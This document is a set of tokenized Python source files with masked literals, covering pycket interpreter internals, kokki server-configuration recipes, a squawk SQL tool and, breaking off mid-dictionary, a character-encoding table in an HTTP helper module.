<EOL> self . init_proxy ( inner , prop_keys , prop_vals ) <EOL> def is_non_interposing_chaperone ( self ) : <EOL> return ( not has_accessor ( self . handler_map ) and <EOL> has_property_descriptor ( self . property_map ) ) <EOL> def post_ref_cont ( self , interp , app , env , cont ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def post_set_cont ( self , op , field , val , app , env , cont ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def ref_with_extra_info ( self , field , app , env , cont ) : <EOL> pass <EOL> def set_with_extra_info ( self , field , val , app , env , cont ) : <EOL> pass <EOL> def get_prop ( self , property , env , cont ) : <EOL> pair = self . get_property ( property , NONE_PAIR ) <EOL> assert type ( pair ) is Pair <EOL> op , interp = pair <EOL> if op is None or interp is None : <EOL> return self . inner . get_prop ( property , env , cont ) <EOL> after = self . post_ref_cont ( interp , None , env , cont ) <EOL> return op . call ( [ self . inner ] , env , after ) <EOL> @ guarded_loop ( enter_above_depth ( <NUM_LIT:5> ) , always_use_labels = False ) <EOL> def get_struct_info ( self , env , cont ) : <EOL> handler = self . handler_map . lookup ( INFO_HANDLER_IDX , self . handlers ) <EOL> if handler is not None : <EOL> cont = call_cont ( handler , env , cont ) <EOL> return self . inner . get_struct_info ( env , cont ) <EOL> def get_arity ( self ) : <EOL> return get_base_object ( self . base ) . get_arity ( ) <EOL> def vals ( self ) : <EOL> return self . inner . vals ( ) <EOL> def valid_struct_proc ( x ) : <EOL> v = get_base_object ( x ) <EOL> return ( isinstance ( v , values_struct . W_StructFieldAccessor ) or <EOL> isinstance ( v , values_struct . W_StructFieldMutator ) or <EOL> isinstance ( v , values_struct . W_StructPropertyAccessor ) ) <EOL> @ continuation <EOL> def imp_struct_set_cont ( orig_struct , setter , field , app , env , cont , _vals ) : <EOL> from pycket . interpreter import check_one_val <EOL> val = check_one_val ( _vals ) <EOL> if setter is values . w_false : <EOL> return orig_struct . set_with_extra_info ( field , val , app , env , cont ) <EOL> return setter . call_with_extra_info ( [ orig_struct , val ] , env , cont , app ) </s>
<s> import pycket . config <EOL> import pytest <EOL> def pytest_addoption ( parser ) : <EOL> parser . addoption ( '<STR_LIT>' , action = '<STR_LIT:store>' , default = "<STR_LIT>" , help = '<STR_LIT>' ) <EOL> def pytest_configure ( config ) : <EOL> byte_flag = config . getvalue ( '<STR_LIT>' ) <EOL> if byte_flag == "<STR_LIT>" : <EOL> print "<STR_LIT>" <EOL> config . byte_option = False <EOL> elif byte_flag == "<STR_LIT>" : <EOL> print "<STR_LIT>" <EOL> config . byte_option = True <EOL> def pytest_funcarg__racket_file ( request ) : <EOL> tmpdir = request . getfuncargvalue ( '<STR_LIT>' ) <EOL> name = '<STR_LIT>' <EOL> assert request . function . __doc__ is not None <EOL> file_name = tmpdir / name <EOL> file_name . write ( request . function . __doc__ ) <EOL> return str ( file_name ) <EOL> def pytest_funcarg__empty_json ( request ) : <EOL> def make_filename ( ) : <EOL> import inspect , py <EOL> module_file = inspect . getmodule ( request . function ) . __file__ <EOL> return str ( py . path . local ( module_file ) . dirpath ( "<STR_LIT>" ) ) <EOL> return request . cached_setup ( setup = make_filename , scope = "<STR_LIT>" ) <EOL> def pytest_funcarg__source ( request ) : <EOL> assert request . function . __doc__ is not None <EOL> code = request . function . __doc__ <EOL> return code <EOL> def pytest_funcarg__doctest ( request ) : <EOL> from textwrap import dedent <EOL> from pycket . test . testhelper import check_equal , execute <EOL> from pycket . error import SchemeException <EOL> assert request . function . __doc__ is not None <EOL> code = dedent ( request . function . __doc__ ) <EOL> lines = [ lin for lin in code . splitlines ( ) if lin ] <EOL> setup = [ ] <EOL> exprs = [ ] <EOL> expect = [ ] <EOL> errors = [ ] <EOL> current_let = [ ] <EOL> setup_done = False <EOL> for line in lines : <EOL> if line [ <NUM_LIT:0> ] == "<STR_LIT:;>" : <EOL> continue <EOL> if not line . strip ( ) : <EOL> continue <EOL> elif line [ <NUM_LIT:0> ] == "<STR_LIT:!>" : <EOL> if setup_done : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> setup . append ( line [ <NUM_LIT:2> : ] ) <EOL> elif line [ <NUM_LIT:0> ] == "<STR_LIT:>>" : <EOL> setup_done = True <EOL> current_let . append ( line [ <NUM_LIT:2> : ] ) <EOL> elif line [ <NUM_LIT:0> ] == "<STR_LIT:E>" : <EOL> errors . append ( line [ <NUM_LIT:1> : ] ) <EOL> elif line [ <NUM_LIT:0> ] in "<STR_LIT>" : <EOL> current_let [ - <NUM_LIT:1> ] += "<STR_LIT:\n>" + line [ <NUM_LIT:2> : ] <EOL> else : <EOL> exprs . append ( current_let [ <NUM_LIT:0> ] if len ( current_let ) == <NUM_LIT:1> else current_let ) <EOL> current_let = [ ] <EOL> expect . append ( line ) <EOL> pairs = [ ] <EOL> for pair in zip ( exprs , expect ) : <EOL> pairs . extend ( pair ) <EOL> check_equal ( * pairs , extra = "<STR_LIT:\n>" . join ( setup ) ) <EOL> for error in errors : <EOL> with pytest . raises ( SchemeException ) : <EOL> execute ( error , extra = "<STR_LIT:\n>" . join ( setup ) ) <EOL> return True </s>
<s> from pycket . base import W_Object <EOL> from pycket . error import SchemeException <EOL> from pycket import values , values_string <EOL> from pycket import regexp <EOL> from rpython . rlib . rsre import rsre_core , rsre_char , rsre_re <EOL> from rpython . rlib import buffer , jit , rstring <EOL> from rpython . rlib . objectmodel import specialize <EOL> import sys <EOL> CACHE = regexp . RegexpCache ( ) <EOL> class PortBuffer ( buffer . Buffer ) : <EOL> """<STR_LIT>""" <EOL> _immutable_ = True <EOL> def __init__ ( self , w_port ) : <EOL> self . w_port = w_port <EOL> l = w_port . _length_up_to_end ( ) <EOL> assert l >= <NUM_LIT:0> <EOL> self . length = l <EOL> self . read_so_far = [ ] <EOL> def getlength ( self ) : <EOL> return self . length <EOL> def getitem ( self , index ) : <EOL> if index >= len ( self . read_so_far ) : <EOL> nchars = len ( self . read_so_far ) - index + <NUM_LIT:1> <EOL> self . read_so_far . extend ( list ( self . w_port . read ( nchars ) ) ) <EOL> ch = self . read_so_far [ index ] <EOL> return ch <EOL> class W_AnyRegexp ( W_Object ) : <EOL> _immutable_fields_ = [ "<STR_LIT:source>" ] <EOL> errorname = "<STR_LIT>" <EOL> def __init__ ( self , source ) : <EOL> self . source = source <EOL> self . code = None <EOL> def ensure_compiled ( self ) : <EOL> if self . code is None : <EOL> code , flags , groupcount , groupindex , indexgroup , group_offsets = regexp . compile ( CACHE , self . source , <NUM_LIT:0> ) <EOL> self . code = code <EOL> self . flags = flags <EOL> self . groupcount = groupcount <EOL> self . groupindex = groupindex <EOL> self . indexgroup = indexgroup <EOL> self . group_offsets = group_offsets <EOL> @ specialize . argtype ( <NUM_LIT:1> ) <EOL> def make_ctx ( self , s , start , end ) : <EOL> self . ensure_compiled ( ) <EOL> start , end = rsre_core . _adjust ( start , end , len ( s ) ) <EOL> if isinstance ( s , unicode ) : <EOL> return rsre_core . UnicodeMatchContext ( self . code , s , start , end , self . flags ) <EOL> return rsre_core . StrMatchContext ( self . code , s , start , end , self . flags ) <EOL> @ specialize . argtype ( <NUM_LIT:1> ) <EOL> def match_string ( self , s , start = <NUM_LIT:0> , end = sys . maxint ) : <EOL> ctx = self . make_ctx ( s , start , end ) <EOL> if not rsre_core . search_context ( ctx ) : <EOL> return None <EOL> return _extract_result ( ctx , self . groupcount ) <EOL> @ specialize . call_location ( ) <EOL> def _match_all_strings ( self , extract , s , start , end ) : <EOL> ctx = self . make_ctx ( s , start , end ) <EOL> matchlist = [ ] <EOL> while ctx . match_start <= ctx . end : <EOL> if not rsre_core . search_context ( ctx ) : <EOL> break <EOL> match = extract ( ctx , self . groupcount ) <EOL> matchlist . append ( match ) <EOL> no_progress = ( ctx . match_start == ctx . match_end ) <EOL> ctx . reset ( ctx . match_end + no_progress ) <EOL> return matchlist <EOL> @ specialize . argtype ( <NUM_LIT:1> ) <EOL> def match_all_strings ( self , s , start = <NUM_LIT:0> , end = sys . maxint ) : <EOL> return self . _match_all_strings ( _extract_result , s , start , end ) <EOL> @ specialize . argtype ( <NUM_LIT:1> ) <EOL> def match_all_string_positions ( self , s , start = <NUM_LIT:0> , end = sys . maxint ) : <EOL> return self . _match_all_strings ( _extract_spans , s , start , end ) <EOL> @ specialize . argtype ( <NUM_LIT:1> ) <EOL> def match_string_positions ( self , s , start = <NUM_LIT:0> , end = sys . maxint ) : <EOL> ctx = self . make_ctx ( s , start , end ) <EOL> if not rsre_core . search_context ( ctx ) : <EOL> return None <EOL> return _extract_spans ( ctx , self . groupcount ) <EOL> def match_port_positions ( self , w_port ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def match_port ( self , w_port , start = <NUM_LIT:0> , end = sys . maxint ) : <EOL> self . ensure_compiled ( ) <EOL> if isinstance ( w_port , values . W_StringInputPort ) : <EOL> ctx = rsre_core . search ( self . code , w_port . str , start = w_port . ptr ) <EOL> if not ctx : <EOL> return None <EOL> start , end = ctx . span ( <NUM_LIT:0> ) <EOL> w_port . ptr = end <EOL> return _extract_result ( ctx , self . groupcount ) <EOL> buf = PortBuffer ( w_port ) <EOL> end = min ( end , buf . getlength ( ) ) <EOL> ctx = rsre_core . BufMatchContext ( self . code , buf , <NUM_LIT:0> , end , <NUM_LIT:0> ) <EOL> matched = rsre_core . search_context ( ctx ) <EOL> if not matched : <EOL> return None <EOL> return _extract_result ( ctx , self . groupcount ) <EOL> def equal ( self , other ) : <EOL> if not isinstance ( other , W_AnyRegexp ) : <EOL> return False <EOL> if type ( self ) is type ( other ) : <EOL> return self . source == other . source <EOL> return False <EOL> def tostring ( self ) : <EOL> return '<STR_LIT>' % self . source <EOL> @ rsre_core . specializectx <EOL> @ jit . unroll_safe <EOL> def _extract_spans ( ctx , groupcount ) : <EOL> return [ ctx . span ( i ) for i in range ( groupcount + <NUM_LIT:1> ) ] <EOL> @ rsre_core . specializectx <EOL> @ jit . unroll_safe <EOL> def _extract_result ( ctx , groupcount ) : <EOL> result = [ ] <EOL> for i in range ( groupcount + <NUM_LIT:1> ) : <EOL> start , end = ctx . span ( i ) <EOL> if start == - <NUM_LIT:1> and end == - <NUM_LIT:1> : <EOL> result . append ( None ) <EOL> else : <EOL> assert <NUM_LIT:0> <= start <EOL> assert <NUM_LIT:0> <= end <EOL> result . append ( _getslice ( ctx , start , end ) ) <EOL> return result <EOL> @ rsre_core . specializectx <EOL> def _getslice ( ctx , start , end ) : <EOL> if isinstance ( ctx , rsre_core . StrMatchContext ) : <EOL> return ctx . _string [ start : end ] <EOL> elif isinstance ( ctx , rsre_core . UnicodeMatchContext ) : <EOL> return ctx . _unicodestr [ start : end ] <EOL> else : <EOL> return '<STR_LIT>' . join ( [ chr ( ctx . str ( j ) ) for j in range ( start , end ) ] ) <EOL> class W_Regexp ( W_AnyRegexp ) : pass <EOL> class W_PRegexp ( W_AnyRegexp ) : pass <EOL> class W_ByteRegexp ( W_AnyRegexp ) : pass <EOL> class W_BytePRegexp ( W_AnyRegexp ) : pass <EOL> class ReplacementOption ( object ) : <EOL> _attrs_ = [ ] <EOL> settled = True <EOL> def replace ( self , matches ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> class StringLiteral ( ReplacementOption ) : <EOL> _immutable_fields_ = [ '<STR_LIT:string>' ] <EOL> def __init__ ( self , string ) : <EOL> self . string = string <EOL> def replace ( self , matches ) : <EOL> return self . string <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . string <EOL> class PositionalArg ( ReplacementOption ) : <EOL> _immutable_fields_ = [ '<STR_LIT>' ] <EOL> def __init__ ( self , position ) : <EOL> self . position = position <EOL> def replace ( self , matches ) : <EOL> return matches [ self . position ] <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . position <EOL> def parse_number ( source ) : <EOL> acc = <NUM_LIT:0> <EOL> while not source . at_end ( ) : <EOL> oldpos = source . pos <EOL> ch = source . get ( ) <EOL> if not rsre_char . is_digit ( ord ( ch [ <NUM_LIT:0> ] ) ) : <EOL> source . pos = oldpos <EOL> return acc <EOL> acc = <NUM_LIT:10> * acc + int ( ch ) <EOL> return acc <EOL> def parse_escape_sequence ( source , buffer ) : <EOL> if source . match ( u"<STR_LIT:\\>" ) : <EOL> buffer . append ( u"<STR_LIT:\\>" ) <EOL> return None <EOL> elif source . match ( u"<STR_LIT:&>" ) : <EOL> buffer . append ( u"<STR_LIT:&>" ) <EOL> return None <EOL> elif source . match ( u"<STR_LIT:$>" ) : <EOL> return PositionalArg ( <NUM_LIT:0> ) <EOL> n = parse_number ( source ) <EOL> return PositionalArg ( n ) <EOL> def parse_insert_string ( str ) : <EOL> source = regexp . Source ( str ) <EOL> buffer = rstring . UnicodeBuilder ( ) <EOL> result = [ ] <EOL> while not source . at_end ( ) : <EOL> if source . match ( u"<STR_LIT:\\>" ) : <EOL> escaped = parse_escape_sequence ( source , buffer ) <EOL> if escaped is not None : <EOL> if buffer . getlength ( ) : <EOL> result . append ( StringLiteral ( buffer . build ( ) ) ) <EOL> buffer = rstring . UnicodeBuilder ( ) <EOL> result . append ( escaped ) <EOL> else : <EOL> ch = source . get ( ) <EOL> buffer . append ( ch ) <EOL> if buffer . getlength ( ) : <EOL> result . append ( StringLiteral ( buffer . build ( ) ) ) <EOL> return result <EOL> def do_input_substitution ( formatter , input_string , matched_positions ) : <EOL> matched_strings = [ None ] * len ( matched_positions ) <EOL> for i , ( start , end ) in enumerate ( matched_positions ) : <EOL> assert start >= <NUM_LIT:0> and end >= <NUM_LIT:0> <EOL> matched_strings [ i ] = input_string [ start : end ] <EOL> return u"<STR_LIT>" . join ( [ fmt . replace ( matched_strings ) for fmt in formatter ] ) </s>
<s> import os <EOL> from kokki import Package , File , Service , Script <EOL> Package ( "<STR_LIT>" ) <EOL> File ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" ) <EOL> command = os . path . join ( env . config . busket . path , "<STR_LIT>" , "<STR_LIT>" ) <EOL> Service ( "<STR_LIT>" , <EOL> start_command = "<STR_LIT>" % command , <EOL> stop_command = "<STR_LIT>" % command , <EOL> restart_command = "<STR_LIT>" . format ( command ) , <EOL> status_command = "<STR_LIT>" % command , <EOL> action = "<STR_LIT>" ) <EOL> Script ( "<STR_LIT>" , <EOL> not_if = lambda : os . path . exists ( env . config . busket . path ) , <EOL> cwd = "<STR_LIT>" , <EOL> code = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) . format ( install_path = env . config . busket . path ) , <EOL> notifies = [ ( "<STR_LIT:start>" , env . resources [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) ] , <EOL> ) <EOL> if "<STR_LIT>" in env . included_recipes : <EOL> File ( "<STR_LIT>" , <EOL> owner = "<STR_LIT:root>" , <EOL> group = "<STR_LIT:root>" , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> content = ( <EOL> '<STR_LIT>' <EOL> ) , <EOL> notifies = [ ( "<STR_LIT>" , env . resources [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) ] ) </s>
<s> from kokki import Package , Execute , Mount <EOL> if env . config . mdadm . arrays : <EOL> Package ( "<STR_LIT>" ) <EOL> Execute ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> command = ( "<STR_LIT:(>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT:)>" <EOL> ) ) <EOL> for arr in env . config . mdadm . arrays : <EOL> array = arr . copy ( ) <EOL> fstype = array . pop ( '<STR_LIT>' , None ) <EOL> fsoptions = array . pop ( '<STR_LIT>' , None ) <EOL> mount_point = array . pop ( '<STR_LIT>' , None ) <EOL> env . cookbooks . mdadm . Array ( ** array ) <EOL> if fstype : <EOL> if fstype == "<STR_LIT>" : <EOL> Package ( "<STR_LIT>" ) <EOL> Execute ( "<STR_LIT>" % dict ( fstype = fstype , device = array [ '<STR_LIT:name>' ] ) , <EOL> not_if = """<STR_LIT>""" % dict ( device = array [ '<STR_LIT:name>' ] ) ) <EOL> if mount_point : <EOL> Mount ( mount_point , <EOL> device = array [ '<STR_LIT:name>' ] , <EOL> fstype = fstype , <EOL> options = fsoptions if fsoptions is not None else [ "<STR_LIT>" ] , <EOL> action = [ "<STR_LIT>" , "<STR_LIT>" ] ) </s>
<s> __description__ = "<STR_LIT>" <EOL> __config__ = { <EOL> "<STR_LIT>" : dict ( <EOL> description = "<STR_LIT>" , <EOL> default = { <EOL> } , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = "<STR_LIT>" , <EOL> default = { } , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = "<STR_LIT>" , <EOL> default = { <EOL> "<STR_LIT>" : dict ( <EOL> alias = "<STR_LIT>" , <EOL> members = [ ] , <EOL> ) , <EOL> } , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = "<STR_LIT>" , <EOL> default = { <EOL> "<STR_LIT:all>" : dict ( <EOL> alias = "<STR_LIT>" , <EOL> members = [ "<STR_LIT:*>" ] , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> alias = "<STR_LIT>" , <EOL> members = [ ] , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> alias = "<STR_LIT>" , <EOL> members = [ ] , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> alias = "<STR_LIT>" , <EOL> members = [ ] , <EOL> ) , <EOL> } , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = "<STR_LIT>" , <EOL> default = "<STR_LIT>" , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> "<STR_LIT>" : dict ( <EOL> description = "<STR_LIT>" , <EOL> default = None , <EOL> ) , <EOL> } </s>
<s> from kokki import File , Template <EOL> def SSHConfig ( name , hosts , mode = <NUM_LIT:0> <NUM_LIT> , ** kwargs ) : <EOL> File ( name , <EOL> mode = mode , <EOL> content = Template ( "<STR_LIT>" , { '<STR_LIT>' : hosts } ) , <EOL> ** kwargs ) </s>
<s> from kokki . providers . package import PackageProvider <EOL> import yum <EOL> class DummyCallback ( object ) : <EOL> def event ( self , state , data = None ) : <EOL> pass <EOL> class YumProvider ( PackageProvider ) : <EOL> def get_current_status ( self ) : <EOL> self . candidate_version = None <EOL> self . current_version = None <EOL> yb = yum . YumBase ( ) <EOL> yb . doConfigSetup ( ) <EOL> yb . doTsSetup ( ) <EOL> yb . doRpmDBSetup ( ) <EOL> for pkg in yb . rpmdb . returnPackages ( ) : <EOL> if pkg . name == self . resource . package_name : <EOL> self . current_version = pkg . version <EOL> self . log . debug ( "<STR_LIT>" % ( self . resource . package_name , self . current_version ) ) <EOL> searchlist = [ '<STR_LIT:name>' , '<STR_LIT:version>' ] <EOL> args = [ self . resource . package_name ] <EOL> matching = yb . searchPackages ( searchlist , args ) <EOL> for po in matching : <EOL> if po . name == self . resource . package_name : <EOL> self . candidate_version = po . version <EOL> self . log . debug ( "<STR_LIT>" % ( self . resource . package_name , self . current_version ) ) <EOL> def install_package ( self , name , version ) : <EOL> yb = yum . YumBase ( ) <EOL> yb . doGenericSetup ( ) <EOL> yb . doRepoSetup ( ) <EOL> yb . doLock ( ) <EOL> yb . install ( pattern = name ) <EOL> yb . buildTransaction ( ) <EOL> yb . processTransaction ( callback = DummyCallback ( ) ) <EOL> yb . closeRpmDB ( ) <EOL> yb . doUnlock ( ) <EOL> def upgrade_package ( self , name , version ) : <EOL> return self . install_package ( name , version ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> all <EOL> except NameError : <EOL> def all ( values ) : <EOL> for val in values : <EOL> if not val : <EOL> return False <EOL> return True </s>
<s> from __future__ import with_statement <EOL> import sys <EOL> from optparse import OptionParser <EOL> from squawk . query import Query <EOL> from squawk . output import output_formats <EOL> from squawk . parsers import parsers <EOL> from squawk . sql import sql_parser <EOL> def get_table_names ( tokens ) : <EOL> if not isinstance ( tokens . tables [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , basestring ) : <EOL> return get_table_names ( tokens . tables [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) <EOL> return [ tokens . tables [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ] <EOL> class Combiner ( object ) : <EOL> def __init__ ( self , files , parser_class ) : <EOL> self . files = files <EOL> self . parser_class = parser_class <EOL> self . index = <NUM_LIT:0> <EOL> self . next_file ( ) <EOL> def next_file ( self ) : <EOL> if self . index >= len ( self . files ) : <EOL> raise StopIteration ( ) <EOL> fname = self . files [ self . index ] <EOL> self . parser = self . parser_class ( sys . stdin if fname == '<STR_LIT:->' else open ( fname , "<STR_LIT:r>" ) ) <EOL> self . parser_iter = iter ( self . parser ) <EOL> self . columns = self . parser . columns <EOL> self . index += <NUM_LIT:1> <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> while True : <EOL> try : <EOL> row = self . parser_iter . next ( ) <EOL> except StopIteration : <EOL> self . next_file ( ) <EOL> else : <EOL> return row <EOL> def build_opt_parser ( ) : <EOL> parser = OptionParser ( ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , metavar = "<STR_LIT>" ) <EOL> return parser <EOL> def main ( ) : <EOL> parser = build_opt_parser ( ) <EOL> ( options , args ) = parser . parse_args ( ) <EOL> sql = '<STR_LIT:U+0020>' . join ( args ) . strip ( ) <EOL> if not sql : <EOL> print "<STR_LIT>" <EOL> return <EOL> files = get_table_names ( sql_parser . parseString ( sql ) ) <EOL> parser_name = options . parser <EOL> if parser_name : <EOL> parser = parsers [ parser_name ] <EOL> else : <EOL> fn = files [ <NUM_LIT:0> ] <EOL> if fn . rsplit ( '<STR_LIT:/>' , <NUM_LIT:1> ) [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> parser = parsers [ '<STR_LIT>' ] <EOL> elif fn . endswith ( '<STR_LIT>' ) : <EOL> parser = parsers [ '<STR_LIT>' ] <EOL> else : <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> source = Combiner ( files , parser ) <EOL> query = Query ( sql ) <EOL> output = output_formats [ options . format ] <EOL> output ( query ( source ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import re <EOL> import sys <EOL> import socket <EOL> try : <EOL> from urlparse import urlparse , urlunparse <EOL> except ImportError : <EOL> from urllib . parse import urlparse , urlunparse <EOL> import logging <EOL> try : <EOL> from bs4 import BeautifulSoup <EOL> except ImportError : <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> from . proxy import NullProxy , HttpProxy , Socks5Proxy , httplib , socks <EOL> __license__ = """<STR_LIT>""" <EOL> try : <EOL> from urllib import quote , unquote <EOL> except ImportError : <EOL> from urllib . parse import quote , unquote <EOL> unicodemapping = { '<STR_LIT:U+0020>' : '<STR_LIT>' , <EOL> '<STR_LIT:/>' : '<STR_LIT>' , <EOL> '<STR_LIT:\\>' : '<STR_LIT>' , <EOL> "<STR_LIT:'>" : '<STR_LIT>' , <EOL> '<STR_LIT:">' : '<STR_LIT>' , <EOL> '<STR_LIT:>>' : '<STR_LIT>' , <EOL> '<STR_LIT:<>' : '<STR_LIT>' , <EOL> '<STR_LIT:#>' : '<STR_LIT>' , <EOL> '<STR_LIT:!>' : '<STR_LIT>' , <EOL> '<STR_LIT:$>' : '<STR_LIT>' , <EOL> '<STR_LIT:*>' : '<STR_LIT>' , <EOL> '<STR_LIT:@>' : '<STR_LIT>' , <EOL> '<STR_LIT:.>' : '<STR_LIT>' , <EOL> '<STR_LIT:_>' : '<STR_LIT>' , <EOL> '<STR_LIT:(>' : '<STR_LIT>' , <EOL> '<STR_LIT:)>' : '<STR_LIT>' , <EOL> '<STR_LIT:U+002C>' : '<STR_LIT>' , <EOL> '<STR_LIT:%>' : '<STR_LIT>' , <EOL> '<STR_LIT:->' : '<STR_LIT>' , <EOL> '<STR_LIT:;>' : '<STR_LIT>' , <EOL> '<STR_LIT::>' : '<STR_LIT>' , <EOL> '<STR_LIT:|>' : '<STR_LIT>' , <EOL> '<STR_LIT:&>' : '<STR_LIT>' , <EOL> '<STR_LIT:+>' : '<STR_LIT>' , <EOL> '<STR_LIT:=>' : '<STR_LIT>' , <EOL> '<STR_LIT:a>' : '<STR_LIT>' , <EOL> '<STR_LIT:A>' : '<STR_LIT>' , <EOL> '<STR_LIT:b>' : '<STR_LIT>' , <EOL> '<STR_LIT:B>' : '<STR_LIT>' , <EOL> '<STR_LIT:c>' : '<STR_LIT>' , <EOL> '<STR_LIT:C>' : '<STR_LIT>' , <EOL> '<STR_LIT:d>' : '<STR_LIT>' , <EOL> '<STR_LIT:D>' : '<STR_LIT>' , <EOL> '<STR_LIT:e>' : '<STR_LIT>' , <EOL> '<STR_LIT:E>' : '<STR_LIT>' , <EOL> '<STR_LIT:f>' : '<STR_LIT>' , <EOL> '<STR_LIT:F>' : '<STR_LIT>' , <EOL> '<STR_LIT:g>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:h>' : '<STR_LIT>' , <EOL> '<STR_LIT:H>' : '<STR_LIT>' , <EOL> '<STR_LIT:i>' : '<STR_LIT>' , <EOL> '<STR_LIT:I>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:k>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:l>' : '<STR_LIT>' , <EOL> '<STR_LIT:L>' : '<STR_LIT>' , <EOL> '<STR_LIT:m>' : '<STR_LIT>' , <EOL> '<STR_LIT:M>' : '<STR_LIT>' , <EOL> '<STR_LIT:n>' : '<STR_LIT>' , <EOL> '<STR_LIT:N>' : '<STR_LIT>' , <EOL> '<STR_LIT:o>' : '<STR_LIT>' , <EOL> '<STR_LIT:O>' : '<STR_LIT>' , <EOL> '<STR_LIT:p>' : '<STR_LIT>' , <EOL> '<STR_LIT:P>' : '<STR_LIT>' , <EOL> '<STR_LIT:q>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:r>' : '<STR_LIT>' , <EOL> '<STR_LIT:R>' : '<STR_LIT>' , <EOL> '<STR_LIT:s>' : '<STR_LIT>' , <EOL> '<STR_LIT:S>' : '<STR_LIT>' , <EOL> '<STR_LIT:t>' : '<STR_LIT>' , <EOL> '<STR_LIT:T>' : '<STR_LIT>' , <EOL> '<STR_LIT:u>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:v>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:w>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:x>' : '<STR_LIT>' , <EOL> '<STR_LIT:X>' : '<STR_LIT>' , <EOL> '<STR_LIT:y>' : '<STR_LIT>' , <EOL> '<STR_LIT:Y>' : '<STR_LIT>' , <EOL> '<STR_LIT:z>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:0>' : '<STR_LIT>' , 